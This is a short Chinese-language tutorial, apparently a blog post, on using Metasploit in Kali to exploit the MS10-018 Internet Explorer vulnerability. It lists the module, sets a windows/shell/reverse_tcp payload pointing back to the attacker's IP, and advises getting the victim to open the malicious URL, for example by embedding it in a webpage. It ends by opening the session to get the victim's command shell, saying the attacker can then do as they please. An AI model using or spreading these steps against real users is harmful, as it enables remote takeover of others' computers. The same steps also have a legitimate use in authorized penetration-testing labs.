kail利用msf对MS10-018漏洞进行渗透测试

1、打开metasploit工具，等待工具启动。键入search ms10-018

2、use  exploit/windows/browser/ms10_018_ie_behaviors

应用模块

3、安装一个反向链接工具

set payload windows/shell/reverse_tcp

4、设置服务器地址 为攻击者自身ip，运行show options 显示选项

set srvhost 攻击者ip 设置服务提供者ip

set lhost 攻击者ip

show options查看选项

5、显示可以被利用的操作系统

6、执行恶意代码，会生成一个一个URL，想方设法让被攻击者打开。比方说内嵌在网页中，在这里我们就直接在IE内打开这个URL

7、当攻击者打开该URL时，IE卡死，崩溃

8、此时，界面会显示中招的主机

9、执行show sissons  查看会话

10、执行sessions -i 会话号 成功获取到被攻击者cmd

11、此时被攻击者，IE卡死，崩溃，攻击者拿到了被攻击者的权限，为所欲为。

此时就像在xp上一样打开cmd执行命令